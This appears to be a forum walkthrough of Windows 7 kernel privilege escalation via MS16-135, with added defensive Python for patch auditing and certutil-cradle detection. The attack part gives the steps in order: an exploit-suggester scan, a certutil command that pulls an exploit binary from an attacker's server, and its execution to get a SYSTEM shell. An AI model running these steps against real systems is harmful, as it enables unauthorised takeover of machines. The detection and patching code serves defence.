Windows Kernel Exploits - Privilege Escalation

ltx_Lazzarus
Posts: 55
Joined: Tue Apr 09, 2024 8:05 pm

Postby ltx_Lazzarus » Fri May 03, 2024 8:24 pm

Kernel Exploits
Adversaries might try to take advantage of some software flaws to get themselves a leg up, if ya know what I mean. When they find a vulnerability in a program, service, or even the operating system or the kernel itself, they can use that little bugger to run their own code.

Windows Kernel Exploits
First up, we gotta figure out how to spot and transfer those kernel exploits onto our target system. For this little adventure, we'll be using Windows 7 as our target. Before we get started, make sure you've already got your foot in the door and a meterpreter session up and running.

The first step is to scan and find any potential kernel weaknesses. We can do this using the Windows-Exploit-Suggester tool. You can grab the script from this link: https://github.com/AonCyberLabs/Windows ... -Suggester

To use the Windows-Exploit-Suggester, you'll need to run these commands:

Code:

./windows-exploit-suggester.py --update

Alright, that command will download the vulnerability database and save it as a nifty little .xlsx file. We'll be using this database to find any weaknesses on the target system.

Next up, we need to gather some info on the target operating system and its configuration. We can do that by running this command in a good old Windows command prompt:

Code:

systeminfo

Now we need to copy that info and paste it into a file called "systeminfo.txt". We'll be using this file to find any kernel exploits with the Windows-Exploit-Suggester.

We can use the Windows-Exploit-Suggester to find any vulnerabilities on our target system. We'll run this command on our trusty Kali box:

Code:

./windows-exploit-suggester.py --database <DATABASE.XLSX> --systeminfo <SYSTEMINFO.TXT>

The Windows-Exploit-Suggester will give us a list of vulnerabilities we can try to exploit on the target system to bump up our privileges. It's always a good idea to start with the first one it recommends. In this case, let's take a look at the MS16-135 kernel exploit.
Let's do a quick Google search for "MS16-135 exploit" to find out more about it. Looks like there's a GitHub repo with info on the exploit, the source code, and how to use it. Always a good idea to analyze the source code to make sure it's legit and doesn't have any nasty surprises.
In this case, we'll be using the pre-built "41015.exe" exploit.
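The suggester works entirely from the hotfix list inside the systeminfo.txt you pasted together above. Here is an added Python example (my own, not the Windows-Exploit-Suggester's code and not from the original post) that parses that same output and audits it against a required-patch baseline, which is the defender-side version of the same check: a machine that still shows a missing bulletin patch is the one that needs fixing. The systeminfo text, the hostname and the KB numbers in the baseline are constructed sample values; the MS16-135 entry is a placeholder, since the post does not give its KB number.

```python
"""Parse `systeminfo` output and audit installed hotfixes against a baseline.

Added example, not part of the original post or of Windows-Exploit-Suggester.
The sample output below is constructed and abridged, not captured from a host.
"""
import re

# Constructed sample of `systeminfo` output (hostname and KBs are made up).
SAMPLE_SYSTEMINFO = """\
Host Name:                 WIN7-LAB
OS Name:                   Microsoft Windows 7 Professional
OS Version:                6.1.7601 Service Pack 1 Build 7601
System Type:               x64-based PC
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB2534111
                           [02]: KB3124275
                           [03]: KB976902
"""

# Hotfix entries look like "[01]: KB2534111"; generic fields look like "Key:   value".
HOTFIX_RE = re.compile(r"\[\d+\]:\s*(KB\d+)", re.IGNORECASE)
FIELD_RE = re.compile(r"^(?P<key>[^:]+?):\s+(?P<value>.+?)\s*$")


def parse_systeminfo(text):
    """Return os_name, os_version, arch and the set of installed KB numbers."""
    fields = {}
    hotfixes = set()
    for line in text.splitlines():
        m = HOTFIX_RE.search(line)
        if m:
            hotfixes.add(m.group(1).upper())
            continue
        m = FIELD_RE.match(line)
        if m:
            fields[m.group("key").strip()] = m.group("value")
    return {
        "os_name": fields.get("OS Name", ""),
        "os_version": fields.get("OS Version", ""),
        "arch": fields.get("System Type", ""),
        "hotfixes": hotfixes,
    }


def missing_patches(info, required_kbs):
    """KBs from the baseline that the host does not report as installed (sorted)."""
    return sorted(kb.upper() for kb in required_kbs
                  if kb.upper() not in info["hotfixes"])


# Placeholder baseline: take the real KB numbers from the vendor bulletins or
# your patch-management system. "KB-PLACEHOLDER-MS16-135" stands in for the
# MS16-135 patch, whose KB number the post does not give.
REQUIRED_KBS = ["KB2534111", "KB-PLACEHOLDER-MS16-135"]

if __name__ == "__main__":
    info = parse_systeminfo(SAMPLE_SYSTEMINFO)
    print(info["os_name"], "|", info["os_version"], "|", info["arch"])
    print("installed:", sorted(info["hotfixes"]))
    print("missing from baseline:", missing_patches(info, REQUIRED_KBS))
```

Feed it the real systeminfo.txt from a host and a baseline from your patch data and the `missing` list is what an attacker running the suggester would see as candidates; closing that list is the actual mitigation for everything in this thread.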

Now we just need to get it over to the target system.
To do that, we'll start up a local web server on our Kali box using the SimpleHTTPServer Python module:

Code:

sudo python -m SimpleHTTPServer 80

To get that exploit executable over to the target system, we can use the trusty old certutil utility. On the target system, just run this command:

Code:

C:\Temp> certutil -urlcache -f http://<KALI-IP>/41015.exe exploit.exe

Alright, now we can run the exploit executable on the target system. Just navigate to the folder where you downloaded it and run this command:

Code:

C:\Temp> .\exploit.exe

Now, since the exploit needs to know the target operating system, and in our case that's Windows 7, we'll run it like this:

Code:

C:\Temp> .\exploit.exe 7

Once you run the exploit with the OS specified, it should only take a few seconds to do its thing. After that, you should have an elevated shell with NT AUTHORITY\SYSTEM privileges. Just sit back and enjoy that sweet, sweet admin access!
My example:
C:\Temp> whoami
whoami
nt authority\system
stopthe4ttack.box
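The transfer-and-run chain above (certutil -urlcache pulling a binary into C:\Temp, then that binary being executed) is loud in process-creation telemetry. The following Python is an added detection example of my own, not from the original post, run over a constructed process-creation log in a simple key=value form modelled on Sysmon Event ID 1 fields (hostname, user, 203.0.113.10 and the timestamps are all made up). It flags the certutil download cradle and then correlates any later execution of the file that certutil wrote, which is the exact sequence this thread walks through.

```python
"""Detect a certutil download cradle and execution of the file it fetched.

Added example; not part of the original post. The log format is a constructed
key=value rendering of process-creation events (Sysmon Event ID 1 style), and
every host, user, IP and timestamp below is made up.
"""
import re

SAMPLE_PROCESS_LOG = [
    r'2024-05-03T20:20:01Z host=WIN7-LAB user=WIN7-LAB\bob image=C:\Windows\System32\certutil.exe cmdline="certutil -urlcache -f http://203.0.113.10/41015.exe exploit.exe" cwd=C:\Temp',
    r'2024-05-03T20:20:09Z host=WIN7-LAB user=WIN7-LAB\bob image=C:\Temp\exploit.exe cmdline=".\exploit.exe 7" cwd=C:\Temp',
    r'2024-05-03T20:21:00Z host=WIN7-LAB user=WIN7-LAB\bob image=C:\Windows\System32\certutil.exe cmdline="certutil -verify cert.cer" cwd=C:\Users\bob',
    r'2024-05-03T20:22:00Z host=WIN7-LAB user=WIN7-LAB\bob image=C:\Windows\System32\notepad.exe cmdline="notepad notes.txt" cwd=C:\Users\bob',
]

# key=value pairs; values are either double-quoted (may contain spaces) or bare.
KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')
URL_RE = re.compile(r"https?://", re.IGNORECASE)


def parse_event(line):
    """Turn one log line into a dict; the leading token is the timestamp."""
    ev = {"ts": line.split(None, 1)[0]}
    for key, quoted, bare in KV_RE.findall(line):
        ev[key.lower()] = quoted if quoted else bare
    return ev


def _resolve(dest, cwd):
    """Absolute, lower-cased path of certutil's output file (last argument)."""
    dest = dest.strip('"').lower()
    if ":\\" in dest:
        return dest
    return cwd.lower().rstrip("\\") + "\\" + dest.lstrip(".\\")


def detect(lines):
    """Return (timestamp, rule, detail) tuples for suspicious events, in order."""
    alerts = []
    downloaded = {}  # (host, absolute path) -> timestamp of the certutil download
    for ev in map(parse_event, lines):
        image = ev.get("image", "").lower()
        cmd = ev.get("cmdline", "")
        # Rule 1: certutil used as a download cradle (-urlcache with a URL).
        if image.endswith("\\certutil.exe") and "urlcache" in cmd.lower() \
                and URL_RE.search(cmd):
            alerts.append((ev["ts"], "certutil-urlcache-download", cmd))
            path = _resolve(cmd.split()[-1], ev.get("cwd", ""))
            downloaded[(ev.get("host"), path)] = ev["ts"]
            continue
        # Rule 2: a process image is a file that certutil fetched earlier on this host.
        key = (ev.get("host"), image)
        if key in downloaded:
            alerts.append((ev["ts"], "exec-of-certutil-downloaded-file",
                           f"{ev['image']} (downloaded at {downloaded[key]})"))
    return alerts


if __name__ == "__main__":
    for ts, rule, detail in detect(SAMPLE_PROCESS_LOG):
        print(ts, rule, detail)
```

Rule 1 on its own is the well-known certutil cradle signature; rule 2 is what turns two medium-confidence events into one high-confidence incident, because a legitimate certutil -verify (third line) or an ordinary program start (fourth line) never trips it. In a real pipeline the `downloaded` map would live in whatever state store your SIEM or EDR offers, keyed the same way.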
